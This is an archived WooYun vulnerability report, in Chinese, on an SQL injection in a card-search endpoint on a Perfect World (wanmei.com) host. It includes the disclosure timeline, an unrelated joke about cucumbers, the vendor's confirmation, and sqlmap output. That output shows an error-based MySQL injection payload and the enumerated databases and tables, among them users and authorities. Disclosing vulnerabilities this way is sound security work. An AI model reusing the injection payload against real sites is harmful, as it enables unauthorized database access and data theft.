乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-28: 细节已通知厂商并且等待厂商处理中 2016-03-28: 厂商已经确认,细节仅向厂商公开 2016-04-07: 细节向核心白帽子及相关领域专家公开 2016-04-17: 细节向普通白帽子公开 2016-04-27: 细节向实习白帽子公开 2016-05-12: 细节向公众公开
今天中午室友买了黄瓜,没吃完剩了 好几根在桌上,午休起来发现大家都去 上自习了只剩我一个……于是,拿起黄瓜 往她们每人床上扔了根……下午回来,寝 室人异常的齐,进门时都幽怨地看着 我,然后被告知校领导来查寝了……
http://query.hex.wanmei.com/card/search?rarties=1,2&rule=1&type=
sqlmap resumed the following injection point(s) from stored session:---Parameter: rule (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: rarties=1,2&rule=1' AND (SELECT 4701 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4701=4701,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)and '3468'='3468&type=1---[11:00:35] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0[11:00:35] [INFO] fetching database names[11:00:35] [WARNING] reflective value(s) found and filtering out[11:00:36] [INFO] the SQL query used returns 3 entries[11:00:37] [INFO] retrieved: information_schema[11:00:37] [INFO] retrieved: hex_card[11:00:37] [INFO] retrieved: testavailable databases [3]:[*] hex_card[*] information_schema[*] test---Parameter: rule (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: rarties=1,2&rule=1' AND (SELECT 4701 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4701=4701,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)and '3468'='3468&type=1---[11:01:29] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0[11:01:29] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[11:01:29] [INFO] fetching tables for database: 'hex_card'[11:01:29] [WARNING] reflective value(s) found and filtering out[11:01:29] [INFO] the SQL query used returns 16 entries[11:01:29] [INFO] retrieved: authorities[11:01:30] [INFO] retrieved: card[11:01:30] [INFO] retrieved: card_bak_20150604[11:01:30] [INFO] retrieved: card_color[11:01:30] [INFO] retrieved: card_group[11:01:30] [INFO] retrieved: card_match_rule[11:01:31] [INFO] retrieved: child_type[11:01:31] [INFO] retrieved: color[11:01:31] [INFO] retrieved: hero[11:01:31] [INFO] retrieved: mast_type[11:01:31] [INFO] retrieved: match_rule[11:01:32] [INFO] retrieved: rarity[11:01:32] [INFO] retrieved: suit[11:01:32] [INFO] retrieved: suit_card[11:01:32] [INFO] retrieved: users[11:01:32] [INFO] retrieved: version[11:01:33] [INFO] retrieved: 180[11:01:33] [INFO] retrieved: 0[11:01:33] [INFO] retrieved: 20[11:01:33] [INFO] retrieved: 9[11:01:33] [INFO] retrieved: 394[11:01:34] [INFO] retrieved: 6[11:01:34] [INFO] retrieved: 85[11:01:34] [INFO] retrieved: 0[11:01:34] [INFO] retrieved: 6[11:01:34] [INFO] retrieved: 1[11:01:34] [INFO] retrieved: 8[11:01:35] [INFO] retrieved: 3[11:01:35] [INFO] retrieved: 2[11:01:35] [INFO] retrieved: 12[11:01:35] [INFO] retrieved: 9[11:01:35] [INFO] retrieved: 680Database: hex_card+-------------------+---------+| Table | Entries |+-------------------+---------+| card | 680 || card_bak_20150604 | 394 || suit_card | 180 || child_type | 85 || hero | 20 || suit | 12 || authorities | 9 || users | 9 || mast_type | 8 || color | 6 || rarity | 6 || card_group | 3 || `version` | 2 || match_rule | 1 |+-------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2016-03-28 10:59
感谢洞主对完美世界的关注,我们将尽快修补。
暂无
